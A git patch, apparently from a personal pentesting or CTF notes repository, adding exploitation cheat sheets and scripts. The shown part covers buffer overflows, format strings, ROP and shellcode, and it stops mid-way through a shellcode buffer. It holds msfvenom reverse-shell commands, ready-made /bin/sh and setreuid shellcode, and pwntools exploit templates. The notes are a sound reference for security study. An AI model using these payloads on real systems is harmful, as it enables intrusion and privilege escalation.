From a1efefe7cf3c8821c74d5cb37ddddf9193a448f9 Mon Sep 17 00:00:00 2001 From: whx Date: Sun, 13 Nov 2022 22:38:01 +0100 Subject: [PATCH] restructured Exploits --- Exploits/Binaries/ASLR.md | 15 ++ Exploits/Binaries/Buffer Overflow.md | 66 +++++++ Exploits/Binaries/Canary Bypass.md | 10 + Exploits/Binaries/Cut Stack in Half.md | 32 +++ Exploits/Binaries/Format String.md | 105 ++++++++++ Exploits/Binaries/Integral Promotion.md | 42 ++++ Exploits/Binaries/PLT+GOT.md | 32 +++ Exploits/Binaries/Return Address Reuse.md | 121 ++++++++++++ Exploits/Binaries/Ropping.md | 28 +++ Exploits/Binaries/Scripts/bad_chars.py | 8 + Exploits/Binaries/Scripts/brainstorm.py | 65 ++++++ Exploits/Binaries/Scripts/buffer_overflow.py | 54 +++++ Exploits/Binaries/Scripts/canary_bypass.py | 19 ++ Exploits/Binaries/Scripts/fuzzer.py | 24 +++ Exploits/Binaries/Scripts/fuzzer2.py | 24 +++ Exploits/Binaries/Scripts/fuzzer_BO.py | 31 +++ Exploits/Binaries/Scripts/pwn_fuzz.py | 8 + Exploits/Binaries/Shellcode.md | 107 ++++++++++ Exploits/Binaries/amd64 Instructions.md | 77 ++++++++ Exploits/Binaries/amd64.md | 56 ++++++ Exploits/Binaries/pwntools Specifics.md | 15 ++ Exploits/Binaries/radare2.md | 99 ++++++++++ Exploits/Binaries/ret2libc.md | 130 ++++++++++++ .../Binaries/shellcodes/setreuid_shell.as | 23 +++ Exploits/Binaries/shellcodes/setuid_shell.as | 38 ++++ Exploits/CPUs/Meltdown.md | 26 +++ Exploits/Containers/Docker.md | 185 ++++++++++++++++++ Exploits/Containers/Kubernetes.md | 59 ++++++ Exploits/Containers/LXC.md | 32 +++ Exploits/Containers/MicroK8s.md | 39 ++++ Exploits/DNS/Zone Transfer.md | 6 + Exploits/Databases/MSSQL.md | 9 + Exploits/Databases/NoSQL Injection.md | 38 ++++ Exploits/Databases/SQL Injection.md | 157 +++++++++++++++ Exploits/Databases/SQLmap.md | 44 +++++ Exploits/ImageMagick/ImageTragick.md | 3 + Exploits/Java/Confluence OGNL.md | 23 +++ Exploits/Java/Ghidra Debug RCE.md | 19 ++ Exploits/Java/Ghostcat.md | 14 ++ Exploits/Java/Log4Shell.md | 133 +++++++++++++ Exploits/Java/Spring4Shell.md | 14 ++ Exploits/Linux/Capabilities.md | 14 ++ Exploits/Linux/DirtyPipe.md | 15 ++ Exploits/Linux/ExifTool.md | 12 ++ Exploits/Linux/Groups.md | 3 + Exploits/Linux/LD Preload.md | 56 ++++++ Exploits/Linux/NFS RootSquash.md | 21 ++ Exploits/Linux/OverlayFS.md | 6 + Exploits/Linux/PolKit.md | 40 ++++ Exploits/Linux/Racing Conditions.md | 22 +++ Exploits/Linux/SetCap.md | 13 ++ Exploits/Linux/Shared Object Injection.md | 24 +++ Exploits/Linux/Shell Shock.md | 6 + Exploits/Linux/Wildcard Exploitation.md | 26 +++ Exploits/Linux/pkexec.md | 11 ++ Exploits/Linux/sudo.md | 58 ++++++ Exploits/Networks/MAC Spoofing.md | 9 + Exploits/Printers/preta.md | 4 + Exploits/Python/Code Injection.md | 10 + Exploits/Python/Decompile pyc.md | 5 + Exploits/Python/Flask Cookie Decoding.md | 36 ++++ Exploits/Python/Jail Escape.md | 18 ++ Exploits/Python/Lib Hijacking.md | 22 +++ Exploits/Python/Pickle.md | 21 ++ Exploits/Python/Scapy.md | 4 + Exploits/Python/pwntools.md | 3 + Exploits/References.md | 38 ++++ Exploits/SSL+TLS/Heartbleed.md | 8 + Exploits/Web/Bypass JS Filters.md | 10 + Exploits/Web/CSP.md | 52 +++++ Exploits/Web/CSRF.md | 11 ++ Exploits/Web/Command Injection.md | 19 ++ Exploits/Web/Cookie Tampering.md | 22 +++ Exploits/Web/Forced Browsing.md | 23 +++ Exploits/Web/HTTP Header Injection.md | 8 + Exploits/Web/IDOR.md | 3 + Exploits/Web/Iframe.md | 22 +++ Exploits/Web/JWT.md | 88 +++++++++ Exploits/Web/Local File Inclusion.md | 94 +++++++++ Exploits/Web/Methodology.md | 17 ++ Exploits/Web/Node.js Deserialization.md | 14 ++ Exploits/Web/Padding Oracle.md | 16 ++ Exploits/Web/Prototype Pollution JS.md | 31 +++ Exploits/Web/RateLimiting Bypass.md | 18 ++ Exploits/Web/Remote File Inclusion.md | 9 + Exploits/Web/Reregistration.md | 9 + Exploits/Web/SSRF.md | 66 +++++++ Exploits/Web/SSTI.md | 64 ++++++ Exploits/Web/Scripts/check_ssrf.py | 17 ++ Exploits/Web/Scripts/curl_ssrf.sh | 8 + Exploits/Web/Scripts/ip_to_hexdec.py | 31 +++ Exploits/Web/URL Forgery.md | 3 + Exploits/Web/Wordpress.md | 22 +++ Exploits/Web/XPath.md | 6 + Exploits/Web/XSS.md | 149 ++++++++++++++ Exploits/Web/XXE Wordpress.md | 30 +++ Exploits/Web/XXE.md | 78 ++++++++ Exploits/Web/YAML Deserialization.md | 13 ++ Exploits/Windows/Always Install Elevated.md | 24 +++ Exploits/Windows/CrackMapExec.md | 9 + Exploits/Windows/DLL Hijacking.md | 42 ++++ Exploits/Windows/DLL Injection.md | 81 ++++++++ Exploits/Windows/DLL Scripts/hijackdll.c | 14 ++ Exploits/Windows/DLL Scripts/output.dll | Bin 0 -> 100394 bytes Exploits/Windows/DPAPI.md | 27 +++ Exploits/Windows/Further PrintNightmare.md | 54 +++++ Exploits/Windows/Impacket.md | 14 ++ Exploits/Windows/LLMNR.md | 20 ++ Exploits/Windows/LNK Exploit.md | 14 ++ Exploits/Windows/Macros.md | 38 ++++ Exploits/Windows/Pass the Hash.md | 7 + Exploits/Windows/Password in Registry.md | 25 +++ Exploits/Windows/Potatoes.md | 7 + Exploits/Windows/PrintNightmare.md | 27 +++ Exploits/Windows/Process Hollowing.md | 156 +++++++++++++++ Exploits/Windows/Responder.md | 10 + Exploits/Windows/Service Escalation.md | 19 ++ Exploits/Windows/Service Scripts/service.c | 76 +++++++ Exploits/Windows/Shellcode Injection.md | 55 ++++++ Exploits/Windows/Shellcode.md | 95 +++++++++ Exploits/Windows/Thread Hijacking.md | 79 ++++++++ Exploits/Windows/Unquoted Path.md | 56 ++++++ Exploits/Windows/Windows Scripting Host.md | 92 +++++++++ .../Zero Logon Scripts/zero_logon_PoC.py | 100 ++++++++++ Exploits/Windows/Zero Logon.md | 57 ++++++ 125 files changed, 4686 insertions(+) create mode 100644 Exploits/Binaries/ASLR.md create mode 100644 Exploits/Binaries/Buffer Overflow.md create mode 100644 Exploits/Binaries/Canary Bypass.md create mode 100644 Exploits/Binaries/Cut Stack in Half.md create mode 100644 Exploits/Binaries/Format String.md create mode 100644 Exploits/Binaries/Integral Promotion.md create mode 100644 Exploits/Binaries/PLT+GOT.md create mode 100644 Exploits/Binaries/Return Address Reuse.md create mode 100644 Exploits/Binaries/Ropping.md create mode 100755 Exploits/Binaries/Scripts/bad_chars.py create mode 100644 Exploits/Binaries/Scripts/brainstorm.py create mode 100755 Exploits/Binaries/Scripts/buffer_overflow.py create mode 100644 Exploits/Binaries/Scripts/canary_bypass.py create mode 100755 Exploits/Binaries/Scripts/fuzzer.py create mode 100644 Exploits/Binaries/Scripts/fuzzer2.py create mode 100755 Exploits/Binaries/Scripts/fuzzer_BO.py create mode 100644 Exploits/Binaries/Scripts/pwn_fuzz.py create mode 100644 Exploits/Binaries/Shellcode.md create mode 100644 Exploits/Binaries/amd64 Instructions.md create mode 100644 Exploits/Binaries/amd64.md create mode 100644 Exploits/Binaries/pwntools Specifics.md create mode 100644 Exploits/Binaries/radare2.md create mode 100644 Exploits/Binaries/ret2libc.md create mode 100644 Exploits/Binaries/shellcodes/setreuid_shell.as create mode 100644 Exploits/Binaries/shellcodes/setuid_shell.as create mode 100644 Exploits/CPUs/Meltdown.md create mode 100644 Exploits/Containers/Docker.md create mode 100644 Exploits/Containers/Kubernetes.md create mode 100644 Exploits/Containers/LXC.md create mode 100644 Exploits/Containers/MicroK8s.md create mode 100644 Exploits/DNS/Zone Transfer.md create mode 100644 Exploits/Databases/MSSQL.md create mode 100644 Exploits/Databases/NoSQL Injection.md create mode 100644 Exploits/Databases/SQL Injection.md create mode 100644 Exploits/Databases/SQLmap.md create mode 100644 Exploits/ImageMagick/ImageTragick.md create mode 100644 Exploits/Java/Confluence OGNL.md create mode 100644 Exploits/Java/Ghidra Debug RCE.md create mode 100644 Exploits/Java/Ghostcat.md create mode 100644 Exploits/Java/Log4Shell.md create mode 100644 Exploits/Java/Spring4Shell.md create mode 100644 Exploits/Linux/Capabilities.md create mode 100644 Exploits/Linux/DirtyPipe.md create mode 100644 Exploits/Linux/ExifTool.md create mode 100644 Exploits/Linux/Groups.md create mode 100644 Exploits/Linux/LD Preload.md create mode 100644 Exploits/Linux/NFS RootSquash.md create mode 100644 Exploits/Linux/OverlayFS.md create mode 100644 Exploits/Linux/PolKit.md create mode 100644 Exploits/Linux/Racing Conditions.md create mode 100644 Exploits/Linux/SetCap.md create mode 100644 Exploits/Linux/Shared Object Injection.md create mode 100644 Exploits/Linux/Shell Shock.md create mode 100644 Exploits/Linux/Wildcard Exploitation.md create mode 100644 Exploits/Linux/pkexec.md create mode 100644 Exploits/Linux/sudo.md create mode 100644 Exploits/Networks/MAC Spoofing.md create mode 100644 Exploits/Printers/preta.md create mode 100644 Exploits/Python/Code Injection.md create mode 100644 Exploits/Python/Decompile pyc.md create mode 100644 Exploits/Python/Flask Cookie Decoding.md create mode 100644 Exploits/Python/Jail Escape.md create mode 100644 Exploits/Python/Lib Hijacking.md create mode 100644 Exploits/Python/Pickle.md create mode 100644 Exploits/Python/Scapy.md create mode 100644 Exploits/Python/pwntools.md create mode 100644 Exploits/References.md create mode 100644 Exploits/SSL+TLS/Heartbleed.md create mode 100644 Exploits/Web/Bypass JS Filters.md create mode 100644 Exploits/Web/CSP.md create mode 100644 Exploits/Web/CSRF.md create mode 100644 Exploits/Web/Command Injection.md create mode 100644 Exploits/Web/Cookie Tampering.md create mode 100644 Exploits/Web/Forced Browsing.md create mode 100644 Exploits/Web/HTTP Header Injection.md create mode 100644 Exploits/Web/IDOR.md create mode 100644 Exploits/Web/Iframe.md create mode 100644 Exploits/Web/JWT.md create mode 100644 Exploits/Web/Local File Inclusion.md create mode 100644 Exploits/Web/Methodology.md create mode 100644 Exploits/Web/Node.js Deserialization.md create mode 100644 Exploits/Web/Padding Oracle.md create mode 100644 Exploits/Web/Prototype Pollution JS.md create mode 100644 Exploits/Web/RateLimiting Bypass.md create mode 100644 Exploits/Web/Remote File Inclusion.md create mode 100644 Exploits/Web/Reregistration.md create mode 100644 Exploits/Web/SSRF.md create mode 100644 Exploits/Web/SSTI.md create mode 100644 Exploits/Web/Scripts/check_ssrf.py create mode 100644 Exploits/Web/Scripts/curl_ssrf.sh create mode 100644 Exploits/Web/Scripts/ip_to_hexdec.py create mode 100644 Exploits/Web/URL Forgery.md create mode 100644 Exploits/Web/Wordpress.md create mode 100644 Exploits/Web/XPath.md create mode 100644 Exploits/Web/XSS.md create mode 100644 Exploits/Web/XXE Wordpress.md create mode 100644 Exploits/Web/XXE.md create mode 100644 Exploits/Web/YAML Deserialization.md create mode 100644 Exploits/Windows/Always Install Elevated.md create mode 100644 Exploits/Windows/CrackMapExec.md create mode 100644 Exploits/Windows/DLL Hijacking.md create mode 100644 Exploits/Windows/DLL Injection.md create mode 100644 Exploits/Windows/DLL Scripts/hijackdll.c create mode 100755 Exploits/Windows/DLL Scripts/output.dll create mode 100644 Exploits/Windows/DPAPI.md create mode 100644 Exploits/Windows/Further PrintNightmare.md create mode 100644 Exploits/Windows/Impacket.md create mode 100644 Exploits/Windows/LLMNR.md create mode 100644 Exploits/Windows/LNK Exploit.md create mode 100644 Exploits/Windows/Macros.md create mode 100644 Exploits/Windows/Pass the Hash.md create mode 100644 Exploits/Windows/Password in Registry.md create mode 100644 Exploits/Windows/Potatoes.md create mode 100644 Exploits/Windows/PrintNightmare.md create mode 100644 Exploits/Windows/Process Hollowing.md create mode 100644 Exploits/Windows/Responder.md create mode 100644 Exploits/Windows/Service Escalation.md create mode 100644 Exploits/Windows/Service Scripts/service.c create mode 100644 Exploits/Windows/Shellcode Injection.md create mode 100644 Exploits/Windows/Shellcode.md create mode 100644 Exploits/Windows/Thread Hijacking.md create mode 100644 Exploits/Windows/Unquoted Path.md create mode 100644 Exploits/Windows/Windows Scripting Host.md create mode 100644 Exploits/Windows/Zero Logon Scripts/zero_logon_PoC.py create mode 100644 Exploits/Windows/Zero Logon.md diff --git a/Exploits/Binaries/ASLR.md b/Exploits/Binaries/ASLR.md new file mode 100644 index 0000000..5dbc86e --- /dev/null +++ b/Exploits/Binaries/ASLR.md @@ -0,0 +1,15 @@ +# ASLR + +## System Status + +* `0`, No randomization +* `1`, Conservative, `*.so`, stack, `mmap`, VDSO and heap +* `2`, full randomization + +## Disable + +```sh +echo 0 | sudo tee /proc/sys/kernel/randomize_va_space +``` + + diff --git a/Exploits/Binaries/Buffer Overflow.md b/Exploits/Binaries/Buffer Overflow.md new file mode 100644 index 0000000..c08e81c --- /dev/null +++ b/Exploits/Binaries/Buffer Overflow.md @@ -0,0 +1,66 @@ +# Buffer Overflow +* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst) + +# Usage +* Fuzz & crash the binary pretty roughly via payload +```sh +python -c "print('A' * 3000) +``` + +## Fuzzing +* python 3 +../fuzzer.py + +* python 2 +../fuzzer2.py + +## Measure Offset +* Use as payload +```sh +/opt/metasploit/tools/exploit/pattern_create.rb -l +``` +* Find content of the payload at EIP and identify exact bufferlength +```sh +/opt/metasploit/tools/exploit/pattern_offset.rb -l -q +``` +``` +msf-pattern_offset -l -q +``` +``` +mona msfpattern -l +``` +* Fill offset variable in exploit `buffer_overflow.py` +../buffer_overflow.py + +* Execute buffer_overflow.py, EIP should contain `BBBB` + +## Find bad characters to input in the buffer +* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`. +../bad_chars.py + +* Compare stack if any bad chars block exectuion of the payload following in the next steps. +```sh +!mona bytearray -b "\x00" +!mona compare -f -a +``` + +## Find Jump Point / RoP +* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP` + +### Example: Immunity Debugger using mona on windows machine +```sh +!mona modules +``` +```sh +!mona jmp -r esp -m +``` +* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64 + +## Shellcode as Payload +* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py` +```sh +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f c -e x86/shikata_ga_nai -b "\x00" +msfvenom -p linux/x86/shell_reverse_tcp LHOST= -f c -e x86/shikata_ga_nai -b "\x00" +``` +* Prepend NOPs as padding before shellcode + diff --git a/Exploits/Binaries/Canary Bypass.md b/Exploits/Binaries/Canary Bypass.md new file mode 100644 index 0000000..19fdea5 --- /dev/null +++ b/Exploits/Binaries/Canary Bypass.md @@ -0,0 +1,10 @@ +# Canary Bypass + +* Get canary value from stack via string format exploit as an offset +```sh +%42$p +``` +* Use the found value to add it to the payload +* Afterwards, if the binary is PIE a pointer to the main or the elf which is stack aligned should be found + + diff --git a/Exploits/Binaries/Cut Stack in Half.md b/Exploits/Binaries/Cut Stack in Half.md new file mode 100644 index 0000000..3255b7d --- /dev/null +++ b/Exploits/Binaries/Cut Stack in Half.md @@ -0,0 +1,32 @@ +# Cut Stack in Half + NOPsled + +* Stack has to be executable +* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode +* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard + +## shellcraft +* for example +```sh +shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s +``` + +## Usage +* measure `eip` offset via + ```sh + cyclic + ``` + * Check eip content via gdb + ```sh + cyclic -l + ``` +* Example code +```python +from pwn import * + +padding(cyclic(cyclic_find()) +eip = p32( + some offset into stack) +sled = 90 * 100 +shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80" +payload = padding + eip + sled + shellcode +``` + diff --git a/Exploits/Binaries/Format String.md b/Exploits/Binaries/Format String.md new file mode 100644 index 0000000..ef739fd --- /dev/null +++ b/Exploits/Binaries/Format String.md @@ -0,0 +1,105 @@ +# Format String + +* Read and write values from stack +* [axcheron's writeup](https://axcheron.github.io/exploit-101-format-strings/) + +## Parameters + +|Parameters |Type |Passed as +|-----------------|-------------------------------------------|-----------| +%d decimal (int) value +%u unsigned decimal (unsigned int) value +%x hexadecimal (unsigned int) value +%p hexadecimal (unsigned int), nice layout value +%s string ((const) (unsigned) char*) reference +%n write the number of bytes ypu put in, (*int) reference + +## Offset + +* Read at offset as pointer value at the 42th argument on the stack +```sh +%42$s +``` +* If the pointer at the offset references a string you can dereference by +```sh +%42$s +``` + +## Length of output + +* Padding of the first argument on stack to the given length +```sh +%31337x +``` + +## Read + +* Input `%x` for every value that should be read from the stack. These are the next values at lower addresses, directly under the print format function +```sh +%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x +``` + +* Do long long hex reading from stack +```sh +%llx +``` + +* Select values as string, e.g. the second value +```sh +%2$s +``` +* Another way of reading the pointer is via +```sh +%p +``` +* Read pointer on stack at offset 42 +```sh +%42$p +``` + +* [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one +```python +from pwn import * + +#p = process('./vuln') +p = remote(target_ip, 9006) + +payload = b'%14$p||||' +payload += p32(0x8048000) + +p.sendline(payload) +log.info(p.clean()) +``` + +## Write + +* Writing is done via `%n` +* An example, GOT overwrite. We want to replace the pointer address + * Watch out for the `PTR` from PLT to GOT +```sh +objdump -Mintel -d + +[...] +0000000000401060 : + 401060: ff 25 ca 2f 00 00 jmp QWORD PTR [rip+0x2fca] # 404030 + 401066: 68 03 00 00 00 push 0x3 + 40106b: e9 b0 ff ff ff jmp 401020 <_init+0x20> +[...] +``` +* The `PTR` derefences __0x404030__ +* As an example, the parameter is found at arg 6 on the stack +* Write the address of a function that cannot be reached into the PLT `PTR` to GOT through the buffer, so it will execute. The address which should be written is `0x40123b` +* The input is as follows +```sh +%64c%6$nc %13$hn +``` +* `64c` is `0x40`, rest of address - bytes already + 2 bytes alignment + +## Tips and Tricks + +* Overwrite GOT when there is no FullRELRO, when it is not read only +* Find the input argument on the stack. Write `AAAA` and look out where it is placed on the stack +```sh +AAAA%6$p +``` + diff --git a/Exploits/Binaries/Integral Promotion.md b/Exploits/Binaries/Integral Promotion.md new file mode 100644 index 0000000..abb579b --- /dev/null +++ b/Exploits/Binaries/Integral Promotion.md @@ -0,0 +1,42 @@ +# Integral Promotion + +* Conditions of data types with different max and min values provoke unforseen comparisions +* Comparing `int` and `uint` with values above max leads to integral promotion + +* Check data type min and max +```c +#include +#include + +int main(void) +{ + + printf("CHAR_MAX: %i\n", CHAR_MAX); + printf("UCHAR_MAX: %i\n", UCHAR_MAX); + + printf("SHORT_MAX: %i\n", SHRT_MAX); + printf("USHORT_MAX: %i\n", USHRT_MAX); + + printf("INT_MAX: %i\n", INT_MAX); + printf("UINT_MAX: %u\n", UINT_MAX); + + return 0; +} +``` + +* Not only conditions are susceptable to integral promotions, a sum - for example - is too. Values for promotion in this example are `2147483647` and `1`. `c` is negative and leads to the shell +```c + int a,b,c; + + + if(a >=0 && b >=0) + if(c >= 0){ + printf("\n[*] ADDING %d + %d",a,b); + printf("\n[*] RESULT: %d\n",c); + } + else{ + system("/bin/sh"); + } + else + printf("nope"); +``` diff --git a/Exploits/Binaries/PLT+GOT.md b/Exploits/Binaries/PLT+GOT.md new file mode 100644 index 0000000..ada5f2d --- /dev/null +++ b/Exploits/Binaries/PLT+GOT.md @@ -0,0 +1,32 @@ +# Procedure Lookup Table, Global Offset Table + +* Both are part of dynamic binaries +* PLT resolves called function address of shared object +* A function call inside the binary, to a function inside a shared object is done via PLT +* __PLT__ contains dynamic address, references GOT +* __GOT__ contains the absolute address of the called functions. Dynamic linker updates the GOT +* __Lazy Linking__ is the process of loading the called SO function after they are called for the first time + + +## pwn + +* Overwrite the GOT address of a called functions, which then will be returned instead + +* Check the disassembly of the binary for SO function call +```sh +x/s +x/3i +``` +* This is the PLT address +* Check the GOT address of the PLT. There should be `PTR` via `jmp` to the GOT address of the function + +* Rewrite this address with for example `system`. Take a look where it is placed +```sh +p system +``` +* Set the address of the `jmp` to GOT to `system` address +```sh +set *= +``` + +* Fill the buffer with the argument to `system` diff --git a/Exploits/Binaries/Return Address Reuse.md b/Exploits/Binaries/Return Address Reuse.md new file mode 100644 index 0000000..5953ef1 --- /dev/null +++ b/Exploits/Binaries/Return Address Reuse.md @@ -0,0 +1,121 @@ +# Return Address reuse + +## via Shellcode, an examples +* Find out the address of the start of the buffer and the start address of the return address +* Calculate the difference between these addresses so you know how much data to enter to overflow +* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address + +* Plus NOPsled (sometimes xargs is needed in front of the app call) +```python +python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow +``` + +## Finding Offset +### via gdb segfault output +* 64 bit addresses use 6 out of 8 byte for addresses. +```sh +gdb ./application +run $(python -c "print('\x41' * 180)") +``` +* Return address hit completely when 6 bytes are filled. +```sh +Program received signal SIGSEGV, Segmentation fault. +0x0000414141414141 in copy_arg () +``` +* Buffer = measured_length - (`$rbp` + 6 bytes return address) + +### via metasploit +```sh +/opt/metasploit/tools/exploit/pattern_create.rb -l 180 +``` +* Looking for `rbp` Content in front of the return address to measure offset +```sh +(gdb) i r +[...] +rbp 0x 0x +[...] +``` +* Measure offset +```sh +pt/metasploit/tools/exploit/pattern_offset -l 180 -q +``` + +## Crafting Payload +* Contains Junk/NOPslice + shellcode + Junk over rbp + return address +* Inside gdb +```sh +run $(python -c "print('A' * 100 + + 'A' * 12 + 'B' * 6)") +``` +* Check actual stack +```sh +(gdb) x/100x $rsp-200 +0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff +0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff +0x7fffffffe248: 0xffffe64d 0x00007fff 0x41414141 0x41414141 +0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe278: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe288: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe298: 0x41414141 0x41414141 0x41414141 0x41414141 +0x7fffffffe2a8: 0x41414141 0x41414141 0x41414141 0x48583b6a +0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149 +[...] +``` +* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`. +## NopSled +* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`. +```sh +(gdb) x/100x $rsp-200 +0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff +0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff +0x7fffffffe248: 0xffffe64d 0x00007fff 0x90909090 0x90909090 +0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090 +0x7fffffffe2a8: 0x90909090 0x90909090 0x90909090 0x48583b6a +0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149 +``` +* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address +```sh +run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')") +``` + +## setuid() and setreuid() +* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed. +* `/bin/sh` checks real uid not effective uid +* ./shellcodes/setuid_shell.as + +### setreuid() in assembler +* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) +* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002. +* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`. +* ./shellcode/setreuid_shell.as +```sh +"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05" +``` +* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm) + +### setreuid() in shellcode using pwntools +* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner. +```sh +* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) +shellcraft -f d amd64.linux.setreuid +``` +* The uid can be set as an argument +```sh +shellcraft -f d amd64.linux.setreuid +``` +* Prepend this in front of the existing shellcode like this +```sh +run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')") +``` + * Where the existing shellcode is the following + ```sh + \x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05 + ``` + * Setreuid part is the following + ```sh + \x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05 + ``` diff --git a/Exploits/Binaries/Ropping.md b/Exploits/Binaries/Ropping.md new file mode 100644 index 0000000..8abd17c --- /dev/null +++ b/Exploits/Binaries/Ropping.md @@ -0,0 +1,28 @@ +# ROP Chaining + +## Usage + +* Find cyclic buffer size +* Find gadgets via `ropper` or even better `ropstar` + +## Example +```python +from pwn import * + +s = ssh(host="$TARGET_IP", user="", keyfile="", password="") +p = s.process(['sudo', '']) + +offset= + +# take the ropchain from ropstar +payload = cyclic(offset) +payload += p64(0x4711) +payload += p64(0x235) +payload += p64(0x007) + +print(p.recv()) +p.sendline(payload) +print(p.recv()) +p.sendline("/bin/sh") +p.interactive(prompt='') +``` diff --git a/Exploits/Binaries/Scripts/bad_chars.py b/Exploits/Binaries/Scripts/bad_chars.py new file mode 100755 index 0000000..a56d1a5 --- /dev/null +++ b/Exploits/Binaries/Scripts/bad_chars.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python3 + +from __future__ import print_function +listRem = "\\x0a".split("\\x") +for x in range(1, 256): + if "{:02x}".format(x) not in listRem: + print("\\x" + "{:02x}".format(x), end='') +print() diff --git a/Exploits/Binaries/Scripts/brainstorm.py b/Exploits/Binaries/Scripts/brainstorm.py new file mode 100644 index 0000000..a7eaf98 --- /dev/null +++ b/Exploits/Binaries/Scripts/brainstorm.py @@ -0,0 +1,65 @@ +import sys +import socket + +badchars = bytearray() +listRem = [0x00] +for x in range(1, 256): + if x not in listRem: + badchars.append(x) + +buf = b"" +buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29" +buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77" +buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c" +buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18" +buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5" +buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb" +buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda" +buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48" +buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7" +buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70" +buf += 